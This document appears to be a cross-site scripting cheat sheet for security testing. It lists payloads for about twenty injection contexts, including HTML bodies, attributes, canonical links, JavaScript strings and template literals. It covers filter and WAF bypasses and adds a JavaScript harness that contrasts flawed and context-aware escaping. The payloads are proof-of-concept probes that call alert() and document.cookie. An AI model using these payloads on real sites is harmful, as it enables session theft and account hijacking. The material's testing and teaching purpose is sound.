Cross-site scripting contexts

When testing for reflected and stored XSS, a key task is to identify the XSS context:

a) The location within the response where attacker-controllable data appears.
b) Any input validation or other processing that is being performed on that data by the application.

Based on these details, you can then select one or more candidate XSS payloads, and test whether they are effective.

1. Reflected XSS into HTML context with nothing encoded:

<script>alert(1)</script>

<script>alert(document.domain)</script>

<img src=1 onerror=alert(1)>

2. Stored XSS into HTML context with nothing encoded:

<script>alert(1)</script>

3. Reflected XSS into HTML context with most tags and attributes blocked:

%22%3E%3Cbody%20onresize=alert(document.cookie)%3E"

4. Reflected XSS into HTML context with all tags blocked except custom ones:

%3Cxss+id%3Dx+onfocus%3Dalert%28document.cookie%29%20tabindex=1%3E#x';

5. Reflected XSS with event handlers and href attributes blocked:

%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E

6. Reflected XSS with some SVG markup allowed:

%22%3E%3Csvg%3E%3Cdiscard%20onbegin=alert(1)%3E

7. When the XSS context is into an HTML tag attribute value, you might sometimes be able to terminate the attribute value, close the tag, and introduce a new one:

"><script>alert(document.domain)</script>

8. When angle brackets are blocked or encoded:

" autofocus onfocus=alert(document.domain) x="

9. Reflected XSS into attribute with angle brackets HTML-encoded:

"onmouseover="alert(1)

10. Stored XSS into anchor href attribute with double quotes HTML-encoded:

javascript:alert(1)

<a href="javascript:alert(document.domain)">

11. Reflected XSS in canonical link tag:

%27accesskey=%27x%27onclick=%27alert(1)

12. When the XSS context is some existing JavaScript within the response, the simplest case is to close the script tag that encloses the existing JavaScript and introduce new HTML tags that trigger execution of JavaScript:

</script><img src=1 onerror=alert(document.domain)>

13. Reflected XSS into a JavaScript string with angle brackets HTML-encoded:

'-alert(1)-'
'-alert(document.domain)-'
';alert(document.domain)//

14. Reflected XSS into a JavaScript string with single quote and backslash escaped:

test'payload
</script><script>alert(1)</script>

15. Some applications attempt to prevent input from breaking out of the JavaScript string by escaping any single quote characters with a backslash. A backslash before a character tells the JavaScript parser that the character should be interpreted literally, and not as a special character such as a string terminator. In this situation, applications often make the mistake of failing to escape the backslash character itself. This means that an attacker can use their own backslash character to neutralize the backslash that is added by the application:

';alert(document.domain)//

gets converted to:

\';alert(document.domain)//

You can now use the alternative payload:

\';alert(document.domain)//

which gets converted to:

\\';alert(document.domain)//
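Added example (not code from the original page): a small JavaScript harness that shows why the quote-only escaping described in item 15 fails, and what a context-aware encoder for a JavaScript string literal looks like. `naiveEscape`, `jsStringEscape`, `renderScript`, `structureIntact` and `evaluate` are hypothetical names, the `<script>var name = '...';</script>` template is a constructed stand-in for the vulnerable response, and the probes are the payload shapes from items 14 and 15.

```javascript
// Flawed encoder (the behaviour described in item 15): escapes the single
// quote but not the backslash, so input can neutralise the added backslash.
function naiveEscape(s) {
  return s.replace(/'/g, "\\'");
}

// Hardened encoder: every character that could end the string literal, end
// the line, or let the HTML parser close the <script> block is \uXXXX-escaped.
// The backslash is included so an attacker cannot supply their own.
function jsStringEscape(s) {
  return s.replace(/[\\'"<>\/\r\n\u2028\u2029]/g, (c) =>
    "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Constructed server-side template that reflects input into a JS string.
const PREFIX = "<script>var name = '";
const SUFFIX = "';</script>";

function renderScript(input, encoder) {
  return PREFIX + encoder(input) + SUFFIX;
}

// Checks that the rendered page keeps the structure the developer intended:
// exactly one </script> for the HTML parser, and the JS string literal closes
// exactly where SUFFIX begins (a backslash escapes the one character after it).
function structureIntact(html) {
  if ((html.match(/<\/script/gi) || []).length !== 1) return false;
  const body = html.slice(PREFIX.length);
  let i = 0;
  while (i < body.length && body[i] !== "'") {
    i += body[i] === "\\" ? 2 : 1;
  }
  return body.slice(i) === SUFFIX;
}

// Reflection test: true means the encoder kept the response structure intact.
function evaluate(encoder) {
  const probes = [
    "\\';alert(document.domain)//",                     // item 15 probe
    "test'payload</script><script>alert(1)</script>",   // item 14 probe
    "O'Brien",                                          // benign input
  ];
  return probes.map((p) => structureIntact(renderScript(p, encoder)));
}

// evaluate(naiveEscape)    -> [false, false, true]
// evaluate(jsStringEscape) -> [true, true, true]
```

The hardened encoder is only correct for the JavaScript string context; the same input reflected into an HTML attribute or an event handler (items 18 and 19) needs the encoder for that context instead.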

16. Reflected XSS into a JavaScript string with angle brackets and double quotes HTML-encoded and single quotes escaped:

test'payload
test\payload
\'-alert(1)//

17. Reflected XSS in a JavaScript URL with some characters blocked (WAF bypass):

onerror=alert;throw 1

5&%27},x=x=%3E{throw/**/onerror=alert,1337},toString=x,window%2b%27%27,{x:%27

18. Making use of HTML-encoding. When the XSS context is some existing JavaScript within a quoted tag attribute, such as an event handler, it is possible to make use of HTML-encoding to work around some input filters:

&apos;-alert(document.domain)-&apos;

19. Stored XSS into onclick event with angle brackets and double quotes HTML-encoded and single quotes and backslash escaped:

http://foo?&apos;-alert(1)-&apos;

20. Reflected XSS into a template literal with angle brackets, single and double quotes, backslash and backticks Unicode-escaped:

JavaScript template literals are string literals that allow embedded JavaScript expressions. The embedded expressions are evaluated and are normally concatenated into the surrounding text. Template literals are encapsulated in backticks instead of normal quotation marks, and embedded expressions are identified using the ${...} syntax.

${alert(document.domain)}

${alert(1)}